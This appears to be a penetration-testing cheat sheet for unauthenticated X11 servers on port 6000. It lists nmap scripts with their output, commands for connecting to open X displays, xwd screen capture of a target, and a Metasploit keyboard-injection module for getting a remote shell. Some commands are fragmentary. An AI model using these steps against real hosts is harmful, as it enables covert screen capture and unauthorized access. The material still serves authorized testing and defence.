6000 - X11

The X Window System (X11, or simply X) is a windowing system for bitmap displays, common on Unix-like operating systems. X provides the basic framework for a GUI environment.


Host script results:
|_ x11-access: X server access is granted

Sensepost created the following nmap script

nmap -p6000 <host> --script x11-active-displays.nse
nmap -p6000 <host> --script x11-active-displays.nse --script-args=unsafe=1,dir="/home/<username>/Documents/"
Host script results:
| x11-active-displays: X server access is granted
| Active display
|_ Screenshot saved to /tmp/<ip>:<dp>.jpg
Host script results:
| x11-active-displays: X server access is granted
|_ No active display


X11 No-Auth Scanner - Module scans for X11 servers that allow anyone to connect without authentication.

Connect to X11 server

sudo Xorg -terminate -query $REMOTE_HOST :1
Using X:
X :1 -query
  • To exit press 'ctrl+alt+enter'
To enable XDMCP in Remmina run the following:
sudo apt-get install remmina-plugin-xdmcp

Taking screenshot


XWD It is an X Window System utility that helps in taking screenshots. On our Kali System, we will use the xwd to take the screenshot of Xserver. This utility takes the screenshots in xwd format.
To take a screenshot run:
xwd -root -screen -silent -display > screenshot.xwd
Here we have the screenshot captured by the xwd, but it is in .xwd format, so to view it we will have to convert it to a viewable format like .png
Note: You may need to install imagemagick to convert to png, convert is not pre installed on kali
convert screenshot.xwd screenshot.png
On opening the png file we can see that the xwd tool has successfully captured the screenshot of the target system.


iron@kali2:/opt/xrdp$ python
__ ___ __ __| |_ __
\ \/ / '__/ _` | '_ \
> <| | | (_| | |_) |
/_/\_\_| \__,_| .__/
X11 Remote Desktop <host>:<dp>
Example: --no-disp

Gaining remote shell

we will use the X11 Keyboard Command Injection module of the Metasploit Framework. This module exploits open X11 Server by connecting and registering a virtual keyboard. Then the Virtual Keyboard is used to open an xterm or gnome-terminal and then type and execute the payload.